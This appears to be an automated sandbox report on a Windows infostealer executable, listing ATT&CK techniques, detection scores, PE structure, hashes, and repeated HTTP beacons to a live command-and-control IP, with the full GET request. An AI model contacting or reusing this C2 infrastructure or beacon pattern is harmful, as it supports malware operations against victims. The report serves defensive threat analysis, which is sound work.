Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 341 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 771 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 341 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
file.exe | 32% | ReversingLabs | Win32.Infostealer.Tinba
file.exe | 44% | Virustotal |
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&Fi | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$ | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;b | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6 | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub- | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj% | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%Ch | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubSh | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKc | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKb | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;c | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h | 3% | Virustotal |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6 | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&Fi | file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$ | file.exe, 00000000.00000002.4109269730.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | 3%, Virustotal; Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;b | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub- | file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj% | file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%Ch | file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubSh | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKc | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKb | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkb | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;c | file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.156.72.65 | unknown | Russian Federation | 44636 | ITDELUXE-ASRU | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1565613
                    Start date and time:2024-11-30 09:57:04 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
Time | Type | Description
03:58:25 | API Interceptor | 12058644x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.156.72.65 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.156.72.65/files/download
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | 185.156.72.65/files/download
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65/soft/download
185.156.72.65 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65/files/download
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.946695351883144
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:2'028'032 bytes
                    MD5:97e06acdd95db30f5421cd163f25ec93
                    SHA1:fc2e75139c5d25a46c3fa0e7a0ebe032dca3519a
                    SHA256:df1e3b3a4009381af205e8b587bb0f8b199793968dacc09822091a5c218a3002
                    SHA512:70cc4219b97e3be837b5b21fa81e4d514e7c3c347b37588fae4011b234ca6ea7a627491cde6e3e51e7fbd244c2917e1c71d4b9dfdc8e7221b5803c438d31e760
                    SSDEEP:49152:y97wx4fROFtBK7/i87PUMaPBzGY0DTI8SWKG4uODKAJ:EpfYke+dqaYonZD4
                    TLSH:639533F6EEDB0749C40A8D72B04F97207F2AA2C4655B8F1774850019EA27E3D6F94BD8
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
                    Icon Hash:cfa99b8a8651798d
                    Entrypoint:0x8ba000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F7704E0903Ah
                    Programming Language:
                    • [C++] VS2008 build 21022
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f05b | 0x6f | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x8234 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4b57a8 | 0x18 | zeyoifdy
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x65000 | 0x3ae00 | 562ba5b761cbd9c130fdde85ca8d36a0 | False | 0.9942525875796179 | data | 7.933330547933749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0x8234 | 0x3c00 | 3547e842ea3b49bc0b40c0940fdbd5ea | False | 0.9262369791666667 | data | 7.713040117120127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6f000 | 0x1000 | 0x200 | 6eb091ff88873fe4d3f846082d82dda4 | False | 0.154296875 | data | 1.0965193819233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x70000 | 0x29c000 | 0x200 | 405fde40eca904c9947cf1945896f549 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zeyoifdy | 0x30c000 | 0x1ad000 | 0x1ace00 | 6c53a730537456b86f08837e5951e2fa | False | 0.9922996438720489 | data | 7.949718189685727 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tiucznkd | 0x4b9000 | 0x1000 | 0x400 | a8898745f4a338c61ced4b197a5d3232 | False | 0.7744140625 | data | 6.099739987808857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4ba000 | 0x3000 | 0x2200 | 5368705c78079e4c2d025714e7440d0f | False | 0.06387867647058823 | DOS executable (COM) | 0.7372578603570301 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x66460 | 0xea8 | data | | | 1.0029317697228144
RT_CURSOR | 0x67308 | 0x8a8 | data | | | 1.0049638989169676
RT_CURSOR | 0x67bb0 | 0x568 | data | | | 1.0079479768786128
RT_CURSOR | 0x68118 | 0xea8 | data | | | 1.0029317697228144
RT_CURSOR | 0x68fc0 | 0x8a8 | PGP Secret Sub-key - | | | 1.0049638989169676
RT_CURSOR | 0x69868 | 0x568 | data | | | 0.5228260869565218
RT_ICON | 0x4b5808 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7557603686635944
RT_ICON | 0x4b5808 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7557603686635944
RT_ICON | 0x4b5ed0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6829875518672199
RT_ICON | 0x4b5ed0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6829875518672199
RT_ICON | 0x4b8478 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8058510638297872
RT_ICON | 0x4b8478 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8058510638297872
RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | India | 0
RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | India | 0
RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d494 | 0x520 | empty | Tamil | India | 0
RT_STRING | 0x6d494 | 0x520 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | India | 0
RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | Sri Lanka | 0
RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | India | 0
RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | Sri Lanka | 0
RT_GROUP_CURSOR | 0x6ddfc | 0x30 | empty | | | 0
RT_GROUP_CURSOR | 0x6de2c | 0x30 | empty | | | 0
RT_GROUP_ICON | 0x4b88e0 | 0x30 | data | Tamil | India | 0.9375
RT_GROUP_ICON | 0x4b88e0 | 0x30 | data | Tamil | Sri Lanka | 0.9375
RT_VERSION | 0x4b8910 | 0x254 | data | | | 0.5436241610738255
RT_MANIFEST | 0x4b8b64 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402

DLL | Import
kernel32.dll | lstrcpy

Language of compilation system | Country where language is spoken
Tamil | India
Tamil | Sri Lanka
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2024 09:57:57.956773043 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:57:58.077898026 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:57:58.077996969 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:57:58.078170061 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:57:58.198067904 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:19.969733953 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:19.971524000 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:19.971645117 CET | 49730 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:20.091506958 CET | 80 | 49730 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:22.978467941 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:23.098597050 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:23.098692894 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:23.098862886 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:23.218734026 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:45.016894102 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:45.016962051 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:45.017060041 CET | 49737 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:45.136970997 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:48.025341034 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:48.145445108 CET | 80 | 49738 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:48.145523071 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:48.145662069 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:48.265588045 CET | 80 | 49738 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:56.134947062 CET | 49738 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:59.152834892 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:59.272964001 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:58:59.273062944 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:59.273277998 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:58:59.393105984 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:21.198590040 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:21.198681116 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:21.198797941 CET | 49746 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:21.318665981 CET | 80 | 49746 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:24.216240883 CET | 49802 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:24.336313009 CET | 80 | 49802 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:24.336393118 CET | 49802 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:24.336745024 CET | 49802 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:24.456670046 CET | 80 | 49802 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:46.268191099 CET | 80 | 49802 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:46.268373013 CET | 49802 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:46.268549919 CET | 49802 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:46.388422012 CET | 80 | 49802 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:49.279731035 CET | 49857 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:49.399821997 CET | 80 | 49857 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 09:59:49.400185108 CET | 49857 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:49.400449991 CET | 49857 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 09:59:49.520369053 CET | 80 | 49857 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:11.403184891 CET | 80 | 49857 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:11.403886080 CET | 49857 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:11.409225941 CET | 49857 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:11.529602051 CET | 80 | 49857 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:14.455208063 CET | 49913 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:14.575136900 CET | 80 | 49913 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:14.575233936 CET | 49913 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:14.575529099 CET | 49913 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:14.695388079 CET | 80 | 49913 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:36.472548962 CET | 80 | 49913 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:36.472606897 CET | 49913 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:36.472755909 CET | 49913 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:36.592607975 CET | 80 | 49913 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:39.482553005 CET | 49969 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:39.603087902 CET | 80 | 49969 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:00:39.606142998 CET | 49969 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:39.606142998 CET | 49969 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:00:39.728549957 CET | 80 | 49969 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:01.519653082 CET | 80 | 49969 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:01.519737005 CET | 49969 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:01.529406071 CET | 49969 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:01.649379015 CET | 80 | 49969 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:04.684823990 CET | 50010 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:04.804868937 CET | 80 | 50010 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:04.804966927 CET | 50010 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:04.805888891 CET | 50010 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:04.925858974 CET | 80 | 50010 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:26.794883013 CET | 80 | 50010 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:26.794940948 CET | 50010 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:26.795331955 CET | 50010 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:26.918376923 CET | 80 | 50010 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:29.812118053 CET | 50011 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:29.931994915 CET | 80 | 50011 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:29.932065964 CET | 50011 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:29.932446957 CET | 50011 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:30.052334070 CET | 80 | 50011 | 185.156.72.65 | 192.168.2.4
Nov 30, 2024 10:01:47.950017929 CET | 50011 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:50.966285944 CET | 50012 | 80 | 192.168.2.4 | 185.156.72.65
Nov 30, 2024 10:01:51.086976051 CET | 80 | 50012 | 185.156.72.65 | 192.168.2.4
                    Nov 30, 2024 10:01:51.087111950 CET5001280192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:51.087594032 CET5001280192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:51.210621119 CET8050012185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:55.090039968 CET5001280192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.107230902 CET5001380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.227226973 CET8050013185.156.72.65192.168.2.4
                    Nov 30, 2024 10:01:58.227299929 CET5001380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.227591991 CET5001380192.168.2.4185.156.72.65
                    Nov 30, 2024 10:01:58.347598076 CET8050013185.156.72.65192.168.2.4
                    • 185.156.72.65
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.4 | 49730 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 09:57:58.078170061 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.4 | 49737 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 09:58:23.098862886 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


